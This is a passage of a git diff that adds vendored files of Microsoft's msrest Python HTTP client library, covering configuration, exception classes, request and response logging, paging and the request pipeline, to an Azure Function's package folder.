AsyncPipeline] + + # If set to True, ServiceClient will own the sessionn + self.keep_alive = False + + # Potential credentials pre-declared + self.credentials = None + + if filepath: + self.load(filepath) + + @property + def user_agent(self): + # type: () -> str + """The current user agent value.""" + return self.user_agent_policy.user_agent + + def add_user_agent(self, value): + # type: (str) -> None + """Add value to current user agent with a space. + + :param str value: value to add to user agent. + """ + self.user_agent_policy.add_user_agent(value) + + @property + def enable_http_logger(self): + return self.http_logger_policy.enable_http_logger + + @enable_http_logger.setter + def enable_http_logger(self, value): + self.http_logger_policy.enable_http_logger = value diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/exceptions.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/exceptions.py new file mode 100644 index 0000000..bf10a4a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/exceptions.py @@ -0,0 +1,202 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. 
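# A short usage sketch for the Configuration class above; the base URL and user
# agent string are illustrative placeholders.
from msrest import Configuration

config = Configuration("https://example.azure.com")
config.add_user_agent("azuregoat-sample/0.1")   # delegates to UserAgentPolicy
config.enable_http_logger = True                # delegates to the HTTPLogger policy
print(config.user_agent)                        # reads back from the policy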
+# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +import logging +import sys + +from typing import Callable, Any, Optional, TYPE_CHECKING +from azure.core.exceptions import SerializationError, DeserializationError + +_LOGGER = logging.getLogger(__name__) + + +def raise_with_traceback(exception, message="", *args, **kwargs): + # type: (Callable, str, Any, Any) -> None + """Raise exception with a specified traceback. + + This MUST be called inside a "except" clause. + + :param Exception exception: Error type to be raised. + :param str message: Message to include with error, empty by default. + :param args: Any additional args to be included with exception. + """ + exc_type, exc_value, exc_traceback = sys.exc_info() + # If not called inside a "except", exc_type will be None. Assume it will not happen + exc_msg = "{}, {}: {}".format(message, exc_type.__name__, exc_value) # type: ignore + error = exception(exc_msg, *args, **kwargs) + try: + raise error.with_traceback(exc_traceback) + except AttributeError: + error.__traceback__ = exc_traceback + raise error + + +class ClientException(Exception): + """Base exception for all Client Runtime exceptions. + + :param str message: Description of exception. + :param Exception inner_exception: Nested exception (optional). + """ + + def __init__(self, message, inner_exception=None, *args, **kwargs): + # type: (str, Any, str, str) -> None + self.inner_exception = inner_exception + _LOGGER.debug(message) + super(ClientException, self).__init__(message, *args, **kwargs) # type: ignore + + +class TokenExpiredError(ClientException): + """OAuth token expired, request failed.""" + pass + + +class ValidationError(ClientException): + """Request parameter validation failed. + + :param str rule: Validation rule. + :param str target: Target value for the rule. + :param str value: Value that was invalid. 
+ """ + + _messages = { + "min_length": "must have length greater than {!r}.", + "max_length": "must have length less than {!r}.", + "minimum_ex": "must be greater than {!r}.", + "maximum_ex": "must be less than {!r}.", + "minimum": "must be equal to or greater than {!r}.", + "maximum": "must be equal to or less than {!r}.", + "min_items": "must contain at least {!r} items.", + "max_items": "must contain at most {!r} items.", + "pattern": "must conform to the following pattern: {!r}.", + "unique": "must contain only unique items.", + "multiple": "must be a multiple of {!r}.", + "required": "can not be None.", + "type": "must be of type {!r}" + } + + @staticmethod + def _format_message(rule, reason, value): + if rule == "type" and value.startswith(r"{"): + internal_type = value.strip(r"{}") + value = "dict[str, {}]".format(internal_type) + return reason.format(value) + + def __init__(self, rule, target, value, *args, **kwargs): + # type: (str, str, str, str, str) -> None + self.rule = rule + self.target = target + message = "Parameter {!r} ".format(target) + reason = self._messages.get( + rule, "failed to meet validation requirement.") + message += self._format_message(rule, reason, value) + super(ValidationError, self).__init__(message, *args, **kwargs) + + +class ClientRequestError(ClientException): + """Client request failed.""" + pass + + +class AuthenticationError(ClientException): + """Client request failed to authenticate.""" + pass + + +# Needed only here for type checking +if TYPE_CHECKING: + import requests + from .serialization import Deserializer + +class HttpOperationError(ClientException): + """Client request failed due to server-specified HTTP operation error. + Attempts to deserialize response into specific error object. + + :param Deserializer deserialize: Deserializer with data on custom + error objects. + :param requests.Response response: Server response + :param str resp_type: Objects type to deserialize response. + :param args: Additional args to pass to exception object. + :ivar Model error: Deserialized error model. + """ + _DEFAULT_MESSAGE = "Unknown error" + + def __str__(self): + # type: () -> str + return str(self.message) + + def __init__(self, deserialize, response, + resp_type=None, *args, **kwargs): + # type: (Deserializer, Any, Optional[str], str, str) -> None + self.error = None + self.message = self._DEFAULT_MESSAGE + if hasattr(response, 'internal_response'): + self.response = response.internal_response + else: + self.response = response + try: + if resp_type: + self.error = deserialize(resp_type, response) + if self.error is None: + self.error = deserialize.dependencies[resp_type]() + # ARM uses OData v4, try that by default + # http://docs.oasis-open.org/odata/odata-json-format/v4.0/os/odata-json-format-v4.0-os.html#_Toc372793091 + # Code and Message are REQUIRED + try: + self.message = "({}) {}".format( + self.error.error.code, + self.error.error.message + ) + except AttributeError: + # Try the default for Autorest if not available (compat) + if self.error.message: + self.message = self.error.message + except (DeserializationError, AttributeError, KeyError): + pass + + if not self.error or self.message == self._DEFAULT_MESSAGE: + try: + response.raise_for_status() + # Two possible raises here: + # - Attribute error if response is not ClientResponse. Do not catch. + # - Any internal exception, take it. 
+ except AttributeError: + raise + except Exception as err: # pylint: disable=broad-except + if not self.error: + self.error = err + + if self.message == self._DEFAULT_MESSAGE: + msg = "Operation returned an invalid status code {!r}" + self.message = msg.format(response.reason) + else: + if not self.error: + self.error = response + + # We can't type hint, but at least we can check that + assert self.message is not None + + super(HttpOperationError, self).__init__( + self.message, self.error, *args, **kwargs) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/http_logger.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/http_logger.py new file mode 100644 index 0000000..f025664 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/http_logger.py @@ -0,0 +1,105 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +import logging +import re +import types + +from typing import Any, Optional, TYPE_CHECKING # pylint: disable=unused-import + +if TYPE_CHECKING: + from .universal_http import ClientRequest, ClientResponse # pylint: disable=unused-import + +_LOGGER = logging.getLogger(__name__) + + +def log_request(_, request, *_args, **_kwargs): + # type: (Any, ClientRequest, str, str) -> None + """Log a client request. + + :param _: Unused in current version (will be None) + :param requests.Request request: The request object. + """ + if not _LOGGER.isEnabledFor(logging.DEBUG): + return + + try: + _LOGGER.debug("Request URL: %r", request.url) + _LOGGER.debug("Request method: %r", request.method) + _LOGGER.debug("Request headers:") + for header, value in request.headers.items(): + if header.lower() == 'authorization': + value = '*****' + _LOGGER.debug(" %r: %r", header, value) + _LOGGER.debug("Request body:") + + # We don't want to log the binary data of a file upload. 
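# A streamed upload arrives as a generator, so only a short marker is logged
# below; note the Authorization header was already masked as '*****' above.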
+ if isinstance(request.body, types.GeneratorType): + _LOGGER.debug("File upload") + else: + _LOGGER.debug(str(request.body)) + except Exception as err: # pylint: disable=broad-except + _LOGGER.debug("Failed to log request: %r", err) + + +def log_response(_, _request, response, *_args, **kwargs): + # type: (Any, ClientRequest, ClientResponse, str, Any) -> Optional[ClientResponse] + """Log a server response. + + :param _: Unused in current version (will be None) + :param requests.Request request: The request object. + :param requests.Response response: The response object. + """ + if not _LOGGER.isEnabledFor(logging.DEBUG): + return None + + try: + _LOGGER.debug("Response status: %r", response.status_code) + _LOGGER.debug("Response headers:") + for res_header, value in response.headers.items(): + _LOGGER.debug(" %r: %r", res_header, value) + + # We don't want to log binary data if the response is a file. + _LOGGER.debug("Response content:") + pattern = re.compile(r'attachment; ?filename=["\w.]+', re.IGNORECASE) + header = response.headers.get('content-disposition') + + if header and pattern.match(header): + filename = header.partition('=')[2] + _LOGGER.debug("File attachments: %s", filename) + elif response.headers.get("content-type", "").endswith("octet-stream"): + _LOGGER.debug("Body contains binary data.") + elif response.headers.get("content-type", "").startswith("image"): + _LOGGER.debug("Body contains image data.") + else: + if kwargs.get('stream', False): + _LOGGER.debug("Body is streamable") + else: + _LOGGER.debug(response.text()) + return response + except Exception as err: # pylint: disable=broad-except + _LOGGER.debug("Failed to log response: %s", repr(err)) + return response diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/paging.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/paging.py new file mode 100644 index 0000000..44f60f8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/paging.py @@ -0,0 +1,146 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. 
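# A minimal opt-in sketch for the two logging hooks above: both return early
# unless the module logger is enabled for DEBUG.
import logging

logging.basicConfig()
logging.getLogger("msrest.http_logger").setLevel(logging.DEBUG)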
+# +# -------------------------------------------------------------------------- +import sys +try: + from collections.abc import Iterator + xrange = range +except ImportError: + from collections import Iterator + +from typing import Dict, Any, List, Callable, Optional, TYPE_CHECKING # pylint: disable=unused-import + +from .serialization import Deserializer +from .pipeline import ClientRawResponse + +if TYPE_CHECKING: + from .universal_http import ClientResponse # pylint: disable=unused-import + from .serialization import Model # pylint: disable=unused-import + +if sys.version_info >= (3, 5, 2): + # Not executed on old Python, no syntax error + from .async_paging import AsyncPagedMixin # type: ignore +else: + class AsyncPagedMixin(object): # type: ignore + pass + +class Paged(AsyncPagedMixin, Iterator): + """A container for paged REST responses. + + :param ClientResponse response: server response object. + :param callable command: Function to retrieve the next page of items. + :param dict classes: A dictionary of class dependencies for + deserialization. + :param dict raw_headers: A dict of raw headers to add if "raw" is called + """ + _validation = {} # type: Dict[str, Dict[str, Any]] + _attribute_map = {} # type: Dict[str, Dict[str, Any]] + + def __init__(self, command, classes, raw_headers=None, **kwargs): + # type: (Callable[[str], ClientResponse], Dict[str, Model], Dict[str, str], Any) -> None + super(Paged, self).__init__(**kwargs) # type: ignore + # Sets next_link, current_page, and _current_page_iter_index. + self.next_link = "" + self._current_page_iter_index = 0 + self.reset() + self._derserializer = Deserializer(classes) + self._get_next = command + self._response = None # type: Optional[ClientResponse] + self._raw_headers = raw_headers + + def __iter__(self): + """Return 'self'.""" + # Since iteration mutates this object, consider it an iterator in-and-of + # itself. + return self + + @classmethod + def _get_subtype_map(cls): + """Required for parity to Model object for deserialization.""" + return {} + + @property + def raw(self): + # type: () -> ClientRawResponse + """Get current page as ClientRawResponse. + + :rtype: ClientRawResponse + """ + raw = ClientRawResponse(self.current_page, self._response) + if self._raw_headers: + raw.add_headers(self._raw_headers) + return raw + + def get(self, url): + # type: (str) -> List[Model] + """Get an arbitrary page. + + This resets the iterator and then fully consumes it to return the + specific page **only**. + + :param str url: URL to arbitrary page results. + """ + self.reset() + self.next_link = url + return self.advance_page() + + def reset(self): + # type: () -> None + """Reset iterator to first page.""" + self.next_link = "" + self.current_page = [] # type: List[Model] + self._current_page_iter_index = 0 + + def advance_page(self): + # type: () -> List[Model] + """Force moving the cursor to the next azure call. + + This method is for advanced usage, iterator protocol is preferred. 
+ + :raises: StopIteration if no further page + :return: The current page list + :rtype: list + """ + if self.next_link is None: + raise StopIteration("End of paging") + self._current_page_iter_index = 0 + self._response = self._get_next(self.next_link) + self._derserializer(self, self._response) + return self.current_page + + def __next__(self): + """Iterate through responses.""" + # Storing the list iterator might work out better, but there's no + # guarantee that some code won't replace the list entirely with a copy, + # invalidating an list iterator that might be saved between iterations. + if self.current_page and self._current_page_iter_index < len(self.current_page): + response = self.current_page[self._current_page_iter_index] + self._current_page_iter_index += 1 + return response + else: + self.advance_page() + return self.__next__() + + next = __next__ # Python 2 compatibility. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__init__.py new file mode 100644 index 0000000..838a2d1 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__init__.py @@ -0,0 +1,329 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +from __future__ import absolute_import # we have a "requests" module that conflicts with "requests" on Py2.7 +import abc +try: + import configparser + from configparser import NoOptionError +except ImportError: + import ConfigParser as configparser # type: ignore + from ConfigParser import NoOptionError # type: ignore +import json +import logging +import os.path +try: + from urlparse import urlparse +except ImportError: + from urllib.parse import urlparse +import xml.etree.ElementTree as ET + +from typing import TYPE_CHECKING, Generic, TypeVar, cast, IO, List, Union, Any, Mapping, Dict, Optional, Tuple, Callable, Iterator # pylint: disable=unused-import + +HTTPResponseType = TypeVar("HTTPResponseType") +HTTPRequestType = TypeVar("HTTPRequestType") + +# This file is NOT using any "requests" HTTP implementation +# However, the CaseInsensitiveDict is handy. 
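# Calling pattern for the Paged container above, as generated SDKs drive it
# (SomeModelPaged and get_next_page are illustrative names, not msrest API):
#
#   paged = SomeModelPaged(get_next_page, deserializer.dependencies)
#   for item in paged:              # __next__ advances pages transparently
#       handle(item)
#   page = paged.advance_page()     # or pull page-by-page; StopIteration at the end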
+# If one day we reach the point where "requests" can be skip totally, +# might provide our own implementation +from requests.structures import CaseInsensitiveDict + + +_LOGGER = logging.getLogger(__name__) + +try: + ABC = abc.ABC +except AttributeError: # Python 2.7, abc exists, but not ABC + ABC = abc.ABCMeta('ABC', (object,), {'__slots__': ()}) # type: ignore + +try: + from contextlib import AbstractContextManager # type: ignore +except ImportError: # Python <= 3.5 + class AbstractContextManager(object): # type: ignore + def __enter__(self): + """Return `self` upon entering the runtime context.""" + return self + + @abc.abstractmethod + def __exit__(self, exc_type, exc_value, traceback): + """Raise any exception triggered within the runtime context.""" + return None + +class HTTPPolicy(ABC, Generic[HTTPRequestType, HTTPResponseType]): + """An http policy ABC. + """ + def __init__(self): + self.next = None + + @abc.abstractmethod + def send(self, request, **kwargs): + # type: (Request[HTTPRequestType], Any) -> Response[HTTPRequestType, HTTPResponseType] + """Mutate the request. + + Context content is dependent of the HTTPSender. + """ + pass + +class SansIOHTTPPolicy(Generic[HTTPRequestType, HTTPResponseType]): + """Represents a sans I/O policy. + + This policy can act before the I/O, and after the I/O. + Use this policy if the actual I/O in the middle is an implementation + detail. + + Context is not available, since it's implementation dependent. + if a policy needs a context of the Sender, it can't be universal. + + Example: setting a UserAgent does not need to be tight to + sync or async implementation or specific HTTP lib + """ + def on_request(self, request, **kwargs): + # type: (Request[HTTPRequestType], Any) -> None + """Is executed before sending the request to next policy. + """ + pass + + def on_response(self, request, response, **kwargs): + # type: (Request[HTTPRequestType], Response[HTTPRequestType, HTTPResponseType], Any) -> None + """Is executed after the request comes back from the policy. + """ + pass + + def on_exception(self, request, **kwargs): + # type: (Request[HTTPRequestType], Any) -> bool + """Is executed if an exception comes back from the following + policy. + + Return True if the exception has been handled and should not + be forwarded to the caller. + + This method is executed inside the exception handler. + To get the exception, raise and catch it: + + try: + raise + except MyError: + do_something() + + or use + + exc_type, exc_value, exc_traceback = sys.exc_info() + """ + return False + +class _SansIOHTTPPolicyRunner(HTTPPolicy, Generic[HTTPRequestType, HTTPResponseType]): + """Sync implementation of the SansIO policy. + """ + + def __init__(self, policy): + # type: (SansIOHTTPPolicy) -> None + super(_SansIOHTTPPolicyRunner, self).__init__() + self._policy = policy + + def send(self, request, **kwargs): + # type: (Request[HTTPRequestType], Any) -> Response[HTTPRequestType, HTTPResponseType] + self._policy.on_request(request, **kwargs) + try: + response = self.next.send(request, **kwargs) + except Exception: + if not self._policy.on_exception(request, **kwargs): + raise + else: + self._policy.on_response(request, response, **kwargs) + return response + +class Pipeline(AbstractContextManager, Generic[HTTPRequestType, HTTPResponseType]): + """A pipeline implementation. + + This is implemented as a context manager, that will activate the context + of the HTTP sender. 
+ """ + + def __init__(self, policies=None, sender=None): + # type: (List[Union[HTTPPolicy, SansIOHTTPPolicy]], HTTPSender) -> None + self._impl_policies = [] # type: List[HTTPPolicy] + if not sender: + # Import default only if nothing is provided + from .requests import PipelineRequestsHTTPSender + self._sender = cast(HTTPSender, PipelineRequestsHTTPSender()) + else: + self._sender = sender + for policy in (policies or []): + if isinstance(policy, SansIOHTTPPolicy): + self._impl_policies.append(_SansIOHTTPPolicyRunner(policy)) + else: + self._impl_policies.append(policy) + for index in range(len(self._impl_policies)-1): + self._impl_policies[index].next = self._impl_policies[index+1] + if self._impl_policies: + self._impl_policies[-1].next = self._sender + + def __enter__(self): + # type: () -> Pipeline + self._sender.__enter__() + return self + + def __exit__(self, *exc_details): # pylint: disable=arguments-differ + self._sender.__exit__(*exc_details) + + def run(self, request, **kwargs): + # type: (HTTPRequestType, Any) -> Response + context = self._sender.build_context() + pipeline_request = Request(request, context) # type: Request[HTTPRequestType] + first_node = self._impl_policies[0] if self._impl_policies else self._sender + return first_node.send(pipeline_request, **kwargs) # type: ignore + +class HTTPSender(AbstractContextManager, ABC, Generic[HTTPRequestType, HTTPResponseType]): + """An http sender ABC. + """ + + @abc.abstractmethod + def send(self, request, **config): + # type: (Request[HTTPRequestType], Any) -> Response[HTTPRequestType, HTTPResponseType] + """Send the request using this HTTP sender. + """ + pass + + def build_context(self): + # type: () -> Any + """Allow the sender to build a context that will be passed + across the pipeline with the request. + + Return type has no constraints. Implementation is not + required and None by default. + """ + return None + + +class Request(Generic[HTTPRequestType]): + """Represents a HTTP request in a Pipeline. + + URL can be given without query parameters, to be added later using "format_parameters". + + Instance can be created without data, to be added later using "add_content" + + Instance can be created without files, to be added later using "add_formdata" + + :param str method: HTTP method (GET, HEAD, etc.) + :param str url: At least complete scheme/host/path + :param dict[str,str] headers: HTTP headers + :param files: Files list. + :param data: Body to be sent. + :type data: bytes or str. + """ + def __init__(self, http_request, context=None): + # type: (HTTPRequestType, Optional[Any]) -> None + self.http_request = http_request + self.context = context + + +class Response(Generic[HTTPRequestType, HTTPResponseType]): + """A pipeline response object. + + The Response interface exposes an HTTP response object as it returns through the pipeline of Policy objects. + This ensures that Policy objects have access to the HTTP response. + + This also have a "context" dictionary where policy can put additional fields. + Policy SHOULD update the "context" dictionary with additional post-processed field if they create them. + However, nothing prevents a policy to actually sub-class this class a return it instead of the initial instance. 
+ """ + def __init__(self, request, http_response, context=None): + # type: (Request[HTTPRequestType], HTTPResponseType, Optional[Dict[str, Any]]) -> None + self.request = request + self.http_response = http_response + self.context = context or {} + + +# ClientRawResponse is in Pipeline for compat, but technically there is nothing Pipeline here, this is deserialization + +if TYPE_CHECKING: + from ..universal_http import ClientResponse + +class ClientRawResponse(object): + """Wrapper for response object. + This allows for additional data to be gathereded from the response, + for example deserialized headers. + It also allows the raw response object to be passed back to the user. + + :param output: Deserialized response object. This is the type that would have been returned + directly by the main operation without raw=True. + :param response: Raw response object (by default requests.Response instance) + :type response: ~requests.Response + """ + + def __init__(self, output, response): + # type: (Union[Any], Optional[Union[Response, ClientResponse]]) -> None + from ..serialization import Deserializer + + if isinstance(response, Response): + # If pipeline response, remove that layer + response = response.http_response + + try: + # If universal driver, remove that layer + self.response = response.internal_response # type: ignore + except AttributeError: + self.response = response + + self.output = output + self.headers = {} # type: Dict[str, Optional[Any]] + self._deserialize = Deserializer() + + def add_headers(self, header_dict): + # type: (Dict[str, str]) -> None + """Deserialize a specific header. + + :param dict header_dict: A dictionary containing the name of the + header and the type to deserialize to. + """ + if not self.response: + return + for name, data_type in header_dict.items(): + value = self.response.headers.get(name) + value = self._deserialize(data_type, value) + self.headers[name] = value + + + +__all__ = [ + 'Request', + 'Response', + 'Pipeline', + 'HTTPPolicy', + 'SansIOHTTPPolicy', + 'HTTPSender', + # backward compat + 'ClientRawResponse', +] + +try: + from .async_abc import AsyncPipeline, AsyncHTTPPolicy, AsyncHTTPSender # pylint: disable=unused-import + from .async_abc import __all__ as _async_all + __all__ += _async_all +except SyntaxError: # Python 2 + pass +except ImportError: # pyinstaller won't include Py3 files in Py2.7 mode + pass diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..b1aaee4 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__pycache__/aiohttp.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__pycache__/aiohttp.cpython-39.pyc new file mode 100644 index 0000000..a12ff81 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__pycache__/aiohttp.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__pycache__/async_abc.cpython-39.pyc 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__pycache__/async_abc.cpython-39.pyc new file mode 100644 index 0000000..c714bba Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__pycache__/async_abc.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__pycache__/async_requests.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__pycache__/async_requests.cpython-39.pyc new file mode 100644 index 0000000..c756e8a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__pycache__/async_requests.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__pycache__/requests.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__pycache__/requests.cpython-39.pyc new file mode 100644 index 0000000..19e2ec5 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__pycache__/requests.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__pycache__/universal.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__pycache__/universal.cpython-39.pyc new file mode 100644 index 0000000..cc636ca Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__pycache__/universal.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/aiohttp.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/aiohttp.py new file mode 100644 index 0000000..fd1a497 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/aiohttp.py @@ -0,0 +1,62 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. 
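# A runnable sketch of the sync pipeline machinery from pipeline/__init__.py
# above, using a stub sender so no real HTTP happens; EchoSender and TagPolicy
# are illustrative names, not msrest API.
from msrest.pipeline import Pipeline, HTTPSender, SansIOHTTPPolicy, Response

class TagPolicy(SansIOHTTPPolicy):
    def on_request(self, request, **kwargs):
        request.context = {"tagged": True}      # runs before the sender

class EchoSender(HTTPSender):
    def send(self, request, **config):
        # Echo the wrapped request back as a fake "HTTP response".
        return Response(request, http_response="echo: %r" % request.http_request)
    def __exit__(self, *exc_details):
        pass

with Pipeline(policies=[TagPolicy()], sender=EchoSender()) as pipeline:
    print(pipeline.run("GET /items").http_response)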
+# +# -------------------------------------------------------------------------- +from typing import Any, Optional + +from ..universal_http.aiohttp import AioHTTPSender as _AioHTTPSenderDriver +from . import AsyncHTTPSender, Request, Response + +# Matching requests, because why not? +CONTENT_CHUNK_SIZE = 10 * 1024 + +class AioHTTPSender(AsyncHTTPSender): + """AioHttp HTTP sender implementation. + """ + + def __init__(self, driver: Optional[_AioHTTPSenderDriver] = None, *, loop=None) -> None: + self.driver = driver or _AioHTTPSenderDriver(loop=loop) + + async def __aenter__(self): + await self.driver.__aenter__() + + async def __aexit__(self, *exc_details): # pylint: disable=arguments-differ + await self.driver.__aexit__(*exc_details) + + def build_context(self) -> Any: + """Allow the sender to build a context that will be passed + across the pipeline with the request. + + Return type has no constraints. Implementation is not + required and None by default. + """ + return None + + async def send(self, request: Request, **config: Any) -> Response: + """Send the request using this HTTP sender. + """ + return Response( + request, + await self.driver.send(request.http_request) + ) diff --git 